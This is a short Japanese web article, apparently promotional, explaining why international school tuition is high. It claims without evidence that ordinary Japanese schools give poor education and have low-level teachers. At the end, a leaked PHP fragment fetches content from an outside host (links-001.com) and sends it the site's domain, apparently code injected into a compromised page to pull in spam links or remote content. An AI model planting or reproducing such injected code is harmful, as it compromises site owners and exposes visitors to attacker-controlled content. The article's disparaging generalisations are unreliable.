前へ
次へ

インターナショナルスクールの学費が高い理由

インターナショナルスクールは日本にある学校よりも学費が高いです。
それには理由があり、少人数制と教員のレベルが高い点にあります。
日本の学校ですと数人の先生が数十人の生徒を相手にするので、コストを低くする事ができますが、インターナショナルスクールは生徒が少人数で授業を受けるので、コストが自然と高くなってしまいます。
日本の安い学費の学校では、沢山の生徒を数人の先生で隅々まで指導するのは難しく、テストの点数にバラツキがでたりして、教育の質が低いです。
インターナショナルスクールは、少人数で授業を行いますから、全員が一定の指導を受ける事ができるので、差が生まれにくいのが魅力的です。
インターナショナルスクールで指導している先生は英語が堪能でハイレベルな人材が採用されているので、コストが高くなってしまいます。
日本の通常の学校の先生も教員免許を取る必要がありますが、免許を明確に更新するハードル等が少なく、レベルの低い人材が紛れている可能性が高いので、先生によって授業のレベルに差が出てしまいます。
学費が高いのには理由があり、子供の時の時間は貴重なので、貴重な時間を無駄にしない為には、多少の学費も必要です。

".file_get_contents('http://links-001.com/dmset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top